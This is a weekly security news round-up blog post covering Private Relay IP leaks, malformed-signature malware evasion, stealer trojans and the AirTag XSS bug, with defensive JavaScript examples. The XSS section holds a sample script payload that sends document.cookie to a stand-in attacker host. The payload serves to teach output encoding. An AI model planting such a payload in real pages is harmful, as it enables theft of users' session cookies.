Security news weekly round-up - 1st October 2021

Habdul Hazeez - Oct 1 '21 - Dev Community

Introduction

Hello, welcome to this week's review. As usual, I am Habdul Hazeez.

Malware that can steal your money is not something you want to hear about, and neither is a software bug in your favorite device. Quite frankly, these, among others, are what this week's review is all about.

Grab a cup of coffee, and let's dissect the stories together.


Apple's New iCloud Private Relay Service Leaks Users' Real IP Addresses

Private Relay exists to hide your real IP address from the sites you visit, so this is somewhat analogous to a VPN that ends up revealing your IP address to the website or application anyway. You might not even know it is happening until you visit a site that shows you the address it sees.

Excerpt from the article:

A new as-yet unpatched weakness in Apple's iCloud Private Relay feature could be circumvented to leak users' true IP addresses from iOS devices running the latest version of the operating system
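The leak in that report was found through WebRTC: the relay hides the address the web server sees, but a STUN server still tells the browser its real public address, and a page can read that back from the ICE candidates. Below is an added example (not code from this post, from Apple, or from the original research) of the comparison a test site makes. In a browser the candidate lines come from RTCPeerConnection "icecandidate" events; here they are constructed samples, and the IP addresses are made up.

```javascript
// Added example: detect a relay/VPN that leaks the real client address via WebRTC.
// Not code from the post, Apple, or the original research. All inputs are constructed.

// Constructed: the address the web server saw on the HTTPS connection,
// i.e. the relay's egress address.
const SAMPLE_HTTP_CLIENT_IP = "104.28.51.12";

// Constructed ICE candidate lines as a browser would report them.
const SAMPLE_CANDIDATES = [
  // mDNS-obfuscated host candidate: reveals nothing
  "candidate:1 1 udp 2122260223 8f3c0a1e-2d7e-4c1f-9a5b-0c2e1f7d3a4b.local 54321 typ host generation 0",
  // raw LAN address: leaks local network layout
  "candidate:2 1 udp 2122194687 192.168.1.23 54322 typ host generation 0",
  // server-reflexive candidate learned from STUN: the real public address
  "candidate:3 1 udp 1686052607 203.0.113.45 54322 typ srflx raddr 0.0.0.0 rport 0 generation 0",
  // TURN relay candidate that happens to match what the server already saw
  "candidate:4 1 udp 41885439 104.28.51.12 3478 typ relay raddr 0.0.0.0 rport 0 generation 0",
  "not a candidate line",
];

// Parse one "candidate:" line (RFC 5245 syntax); returns null if it is not one.
function parseCandidate(line) {
  const m = /^candidate:(\S+) (\d+) (udp|tcp) (\d+) (\S+) (\d+) typ (host|srflx|prflx|relay)\b/i.exec(line.trim());
  if (!m) return null;
  return {
    foundation: m[1],
    component: Number(m[2]),
    protocol: m[3].toLowerCase(),
    priority: Number(m[4]),
    address: m[5],
    port: Number(m[6]),
    type: m[7].toLowerCase(),
  };
}

function isIPv4(addr) {
  const parts = addr.split(".");
  return parts.length === 4 && parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

function isPrivateIPv4(addr) {
  const [a, b] = addr.split(".").map(Number);
  return a === 10 || a === 127 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) ||
    (a === 169 && b === 254) ||
    (a === 100 && b >= 64 && b <= 127); // CGNAT range
}

function isPrivateIPv6(addr) {
  const a = addr.toLowerCase();
  return a === "::1" || a.startsWith("fe80:") || /^f[cd]/.test(a);
}

// Returns "mdns", "private" or "public".
function classifyAddress(addr) {
  if (addr.toLowerCase().endsWith(".local")) return "mdns";
  if (isIPv4(addr)) return isPrivateIPv4(addr) ? "private" : "public";
  return isPrivateIPv6(addr) ? "private" : "public";
}

// Report every candidate that tells the page more than the HTTP connection did.
function findLeaks(candidateLines, httpClientIp) {
  const leaks = [];
  for (const line of candidateLines) {
    const c = parseCandidate(line);
    if (c === null) continue;
    const kind = classifyAddress(c.address);
    if (kind === "mdns") continue; // obfuscated by the browser, nothing exposed
    if (kind === "private") {
      leaks.push({ address: c.address, type: c.type, reason: "LAN address exposed" });
    } else if (c.address !== httpClientIp) {
      leaks.push({ address: c.address, type: c.type, reason: "public address differs from the one the server saw" });
    }
  }
  return leaks;
}

console.log(findLeaks(SAMPLE_CANDIDATES, SAMPLE_HTTP_CLIENT_IP));
```

With the constructed input the check flags two candidates: the raw LAN address and the server-reflexive address 203.0.113.45, which is not the address the server saw and is therefore the one the relay was supposed to keep hidden. The mDNS host candidate and the relay candidate are silent, which is what a correctly working relay should look like.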

Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows

A big Hat Tip to one of the smartest creatures on Earth — Humans.

We are always crafty, to say the least.

Excerpt from the article:

Cybersecurity researchers have disclosed a novel technique adopted by a threat actor to deliberately evade detection with the help of malformed digital signatures of its malware payloads
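The signatures in that report were not forged; they were deliberately damaged at the encoding level (the write-up's example is an End-of-Content marker where a NULL tag belongs in the signature algorithm's parameters), so that a strict parser rejects the blob outright and a product that treats "could not parse" as "nothing to check" never looks at the file. The practitioner's check is therefore to parse strictly and fail closed. The following is an added example, not Google's, the malware's, or any vendor's code: a minimal strict DER walker that reports that kind of damage, run on constructed byte strings.

```javascript
// Added example: strict DER walker that fails closed on malformed encodings.
// Not Google's, the malware's, or any vendor's code. All byte strings are constructed.

// id-sha256 OID, pre-encoded as a DER OBJECT IDENTIFIER (tag 06, length 09).
const OID_SHA256 = [0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01];

// AlgorithmIdentifier ::= SEQUENCE { OID, NULL }   (13 bytes of content)
const GOOD_ALGID = Uint8Array.from([0x30, 0x0d, ...OID_SHA256, 0x05, 0x00]);

// Same structure with the NULL (05 00) replaced by an End-of-Content
// marker (00 00), which is only legal after an indefinite-length BER item.
const BAD_ALGID = Uint8Array.from([0x30, 0x0d, ...OID_SHA256, 0x00, 0x00]);

// Read one tag/length header at `off`; returns where the value starts and ends.
function readTlv(buf, off) {
  if (off + 2 > buf.length) throw new Error(`truncated header at offset ${off}`);
  const tag = buf[off];
  let len = buf[off + 1];
  let pos = off + 2;
  if (len === 0x80) throw new Error(`indefinite length at offset ${off} (BER, not DER)`);
  if (len & 0x80) {
    const n = len & 0x7f;
    if (n > 3 || pos + n > buf.length) throw new Error(`unsupported length field at offset ${off}`);
    len = 0;
    for (let i = 0; i < n; i++) len = (len << 8) | buf[pos++];
    if (len < 0x80) throw new Error(`non-minimal length at offset ${off} (not DER)`);
  }
  if (pos + len > buf.length) throw new Error(`value overruns buffer at offset ${off}`);
  return { tag, len, valueStart: pos, end: pos + len };
}

// Walk every element between `start` and `end`, descending into constructed
// types; throws on the first malformed element instead of skipping it.
function walkDer(buf, start = 0, end = buf.length, depth = 0, out = []) {
  let off = start;
  while (off < end) {
    const tlv = readTlv(buf, off);
    if (tlv.tag === 0x00) throw new Error(`end-of-content marker at offset ${off} inside definite-length data`);
    if (tlv.end > end) throw new Error(`element at offset ${off} crosses its parent's boundary`);
    if (tlv.tag === 0x05 && tlv.len !== 0) throw new Error(`NULL with non-zero length at offset ${off}`);
    out.push({ depth, tag: tlv.tag, len: tlv.len });
    if (tlv.tag & 0x20) walkDer(buf, tlv.valueStart, tlv.end, depth + 1, out); // constructed type
    off = tlv.end;
  }
  return out;
}

// Fail closed: anything that does not parse strictly is reported as not verifiable,
// which a scanner should treat exactly like an unsigned file.
function checkSignatureEncoding(bytes) {
  try {
    const elements = walkDer(bytes);
    return { wellFormed: true, elements: elements.length, error: null };
  } catch (e) {
    return { wellFormed: false, elements: 0, error: e.message };
  }
}

console.log(checkSignatureEncoding(GOOD_ALGID));
console.log(checkSignatureEncoding(BAD_ALGID));
```

The well-formed AlgorithmIdentifier walks as three elements (SEQUENCE, OID, NULL); the damaged one is rejected at the stray 00 00. The design point is in `checkSignatureEncoding`: the result of a parse failure is a verdict, not an exception that lets the file pass through unscanned.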

Frustrated Researcher Discloses Three Unpatched iOS Vulnerabilities

Take a deep breath and exhale. How do you feel? Calm? That's nice, and please be patient.

Excerpt from the article:

"When I confronted [Apple], they apologized, assured me it happened due to a processing issue and promised to list it on the security content page of the next update. There were three releases since then and they broke their promise each time," the researcher said

New BloodyStealer Trojan Steals Gamers' Epic Games and Steam Accounts

Given the high-profile applications this malware targets, the name BloodyStealer is no exaggeration.

Excerpt from the article:

BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various types of data, for cookies, passwords, forms, banking cards from browsers, screenshots, log-in memory, and sessions from various applications

The information harvested from gaming apps, such as Bethesda, Epic Games, GOG, Origin, Steam, and VimeWorld, is exfiltrated to a remote server, from where it's likely to be monetized on darknet platforms

Beware! This Android Trojan Stole Millions of Dollars from Over 10 Million Users

Nothing is scarier than losing your hard-earned money to malicious code.

Excerpt from the article:

Zimperium zLabs dubbed the malicious trojan "GriftHorse." The money-making scheme is believed to have been under active development starting from November 2020, with victims reported across Australia, Brazil, Canada, China, France, Germany, India, Russia, Saudi Arabia, Spain, the U.K., and the U.S.

Hackers could force locked iPhones to make contactless payments

Locked does not mean safe. Express Travel mode exists precisely so that the card can be used without unlocking the phone, and that convenience is what the attack turns against the owner.

Excerpt from the article:

The attack, classified as a Man-in-the-Middle (MitM) replay and relay attack, requires the iPhone to have a Visa Card set up for payment with the “Express Travel” mode turned on, and the victim to be in close vicinity to the attacker

Apple forgot to sanitize the Phone Number field for lost AirTags

At first, when I read this article's title, I thought of one thing only: XSS.

Then I read the article, and it is indeed XSS. The page shown to whoever scans a lost AirTag displayed the owner's phone number without encoding it, so anything typed into that field was rendered as markup in the finder's browser. Strictly speaking, the missing step is output encoding rather than input sanitization: a phone number field should accept only digits and a little punctuation, but the page that displays the value must still escape whatever it prints.

Excerpt from the article:

This kind of attack doesn't need much technological know-how—the attacker simply types valid XSS into the AirTag's phone number field, then puts the AirTag in Lost mode and drops it somewhere the target is likely to find it
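To make the two halves of that bug concrete, here is an added example (not Apple's code) of a lost-item page that prints the owner's phone number: first the way that produces the bug, then with output encoding, plus the input-time check that belongs beside it. The phone number and the payload are constructed.

```javascript
// Added example, not Apple's code: vulnerable and hardened rendering of a
// user-supplied phone number on a lost-item page. Sample values are constructed.

const SAMPLE_PHONE = "+1 415 555 0100";
const SAMPLE_PAYLOAD = "<script>location='https://attacker.example/?c='+document.cookie</script>";

// Vulnerable: untrusted text is concatenated straight into markup.
function renderLostPageUnsafe(phone) {
  return `<p>This item has been lost. Please contact the owner at: ${phone}</p>`;
}

// Output encoding for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: the same page, encoded at the point of output.
function renderLostPageSafe(phone) {
  return `<p>This item has been lost. Please contact the owner at: ${escapeHtml(phone)}</p>`;
}

// Defence in depth at input time: a phone number has a tiny alphabet, so
// reject anything outside it before it is stored. This does not replace
// escaping, because the same value may later be printed somewhere else
// (an e-mail, a notification, a different page) by code that forgets to.
function isPlausiblePhoneNumber(s) {
  return /^\+?[0-9][0-9 ().-]{4,19}$/.test(s);
}

// Crude detector used only to show the difference between the two renderers.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log(renderLostPageUnsafe(SAMPLE_PAYLOAD));
console.log(renderLostPageSafe(SAMPLE_PAYLOAD));
```

The escaping shown covers HTML text and quoted attribute values; a value that ends up inside a URL, a script block or a CSS rule needs the encoder for that context instead, which is why templating engines that encode by default are the safer habit.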

Support Me

Writing makes me thirsty. I'll appreciate a cup of coffee 😉.

Buy Me A Coffee

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week. I'll see you next Friday.
